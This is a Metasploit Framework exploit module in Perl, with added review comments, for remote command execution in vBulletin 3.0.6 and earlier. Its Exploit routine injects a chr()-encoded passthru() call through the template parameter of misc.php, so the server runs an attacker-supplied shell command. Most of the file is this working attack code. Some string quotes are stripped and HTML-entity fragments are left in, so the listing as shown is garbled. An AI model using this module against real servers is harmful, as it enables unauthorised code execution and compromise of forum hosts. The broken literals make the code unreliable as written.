##
# Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit
# Name: php_vb3_0_6.pm
# License: Artistic/BSD/GPL
# Info: trying to get the command execution exploits out of the way on milw0rm.com. Ms are always good.
#
#
# - This is an exploit module for the Metasploit Framework, please see
# http://metasploit.com/projects/Framework for more information.
##
package Msf::Exploit::php_vb3_0_6;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;
# Advanced-option table handed to Msf::Exploit->new by new() below; this
# module declares no advanced options.
my $advanced = { };
# Module metadata consumed by the framework through new().
#
# NOTE(review): in this listing the string values (Name, Version, Authors,
# the option type/description cells, Refs, Keys) appear with their quotes
# stripped, so the block as shown does not parse as Perl; read it as a
# description of the module rather than as runnable code.
#
# The title names the precondition as the author states it: the
# "Add Template Name in HTML Comments" option set to Yes on vBulletin at
# or below 3.0.6. Turning that option off or moving past 3.0.6 is the
# setting-level mitigation the title implies (not verified here).
my $info = {
Name => vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit,
Version => $Revision: 1.0 $,
Authors => [ str0ke ],
Arch => [ ],
OS => [ ],
Priv => 0,
# Per-run options; each cell reads [required, type, description, default].
# RPATH's default is the script the request in Exploit() is sent to.
UserOpts =>
{
RHOST => [1, ADDR, The target address],
RPORT => [1, PORT, The target port, 80],
VHOST => [0, DATA, The virtual host name of the server],
RPATH => [1, DATA, Path to the misc.php script, /forum/misc.php],
SSL => [0, BOOL, Use SSL],
},
Description => Pex::Text::Freeform(qq{
This module exploits a code execution flaw in vBulletin <= 3.0.6.
}),
# External reference; MIL is presumably the milw0rm id (the header
# mentions milw0rm.com) -- confirm against the framework's ref table.
Refs =>
[
[MIL, 832],
],
# Payload constraints: Space presumably caps the payload size; Keys
# restricts it to command-string payloads, which Exploit() reads back
# through EncodedPayload->RawPayload.
Payload =>
{
Space => 512,
Keys => [cmd, cmd_bash],
},
# Search keyword(s) for the module -- presumably; not used in this file.
Keys => [vBulletin],
};
sub new {
    my $class = shift;
    # Delegate construction to Msf::Exploit, handing it this module's
    # metadata ($info) and its (empty) advanced-option table ($advanced);
    # any further constructor arguments pass straight through.
    return $class->SUPER::new(
        { Info => $info, Advanced => $advanced },
        @_,
    );
}
# Exploit: builds a single HTTP GET against RPATH whose `template` query
# parameter carries the framework-supplied command payload, sends it,
# reads one reply and returns. The reply is never inspected or printed,
# so the module gives no indication of whether the request succeeded.
#
# NOTE(review): as elsewhere on this page, several string literals appear
# with their quotes stripped (the join/unpack arguments, the socket error
# message) and the `& nbsp;` fragments are HTML entities left by the
# extraction; the body is documented as written, not corrected.
sub Exploit {
my $self = shift;
# Target options as declared under UserOpts in $info.
my $target_host = $self->GetVar(RHOST);
my $target_port = $self->GetVar(RPORT);
# The Host: header falls back to the address when no virtual host is set.
my $vhost = $self->GetVar(VHOST) || $target_host;
my $path & nbsp; = $self->GetVar(RPATH);
# Raw command string chosen by the user (Payload Keys: cmd, cmd_bash).
my $cmd &n bsp; = $self->GetVar(EncodedPayload)->RawPayload;
# Encode the command as a set of chr() function calls
my $byte = join(., map { $_ = chr(.$_.) } unpack(C*, $cmd));
# Create the get request data
# The injection point is the `template` parameter of do=page, wrapped in
# {${passthru(...)}}. For detection this is the visible signature: a
# request to misc.php carrying do=page and a template value containing
# `{${passthru(` followed by a chr() chain.
my $data = "?do=page&template={\${passthru($byte)}}";
my $req =
"GET $path$data HTTP/1.1\r\n".
"Host: $vhost:$target_port\r\n".
"Content-Type: application/html\r\n".
"Content-Length: ". length($data)."\r\n".
"Connection: Close\r\n".
"\r\n";
# Connect through the framework's socket wrapper. Msf::Socket::Tcp is not
# loaded in this file and CPORT is not a declared UserOpt -- presumably
# both come from the Msf::Exploit base; confirm against the framework.
my $s = Msf::Socket::Tcp->new(
PeerAddr => $target_host,
PeerPort => $target_port,
LocalPort => $self->GetVar(CPORT),
SSL => $self->GetVar(SSL),
);
# Connection failure is reported and the run is abandoned.
if ($s->IsError){
$self->PrintLine([*] Error creating socket: . $s->GetError);
return;
}
$self->PrintLine("[*] Sending the malicious vBulletin Get request...");
$s->Send($req);
# Read the reply (the second argument is presumably a timeout in seconds
# -- verify against Msf::Socket::Tcp). $results is not used afterwards.
my $results = $s->Recv(-1, 20);
$s->Close();
return;
}
1;